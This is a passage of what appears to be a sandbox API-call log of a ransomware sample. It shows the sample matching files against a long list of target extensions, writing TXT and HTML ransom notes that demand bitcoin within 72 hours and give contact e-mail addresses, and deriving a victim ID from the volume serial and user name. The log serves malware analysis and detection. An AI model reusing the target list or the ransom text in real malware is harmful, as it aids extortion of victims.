dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0172.537] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0172.537] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0172.537] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0172.537] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\"
	[0172.537] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml"
	[0172.537] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0172.537] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.537] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0172.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.538] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.538] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"
	[0172.538] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml") returned 109
	[0172.538] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.539] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0172.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.539] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0172.539] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0172.539] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
	[0172.540] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 0
	[0172.540] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime"
	[0172.540] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*"
	[0172.540] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.542] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.542] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0172.542] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.546] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.546] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.549] CloseHandle (hObject=0x39c) returned 1
	[0172.550] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.550] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0172.552] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.552] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.552] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.552] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.552] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0172.552] CloseHandle (hObject=0x39c) returned 1
	[0172.553] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.553] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.553] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.554] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0172.554] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.556] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.557] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0172.559] CloseHandle (hObject=0x39c) returned 1
	[0172.560] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.560] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
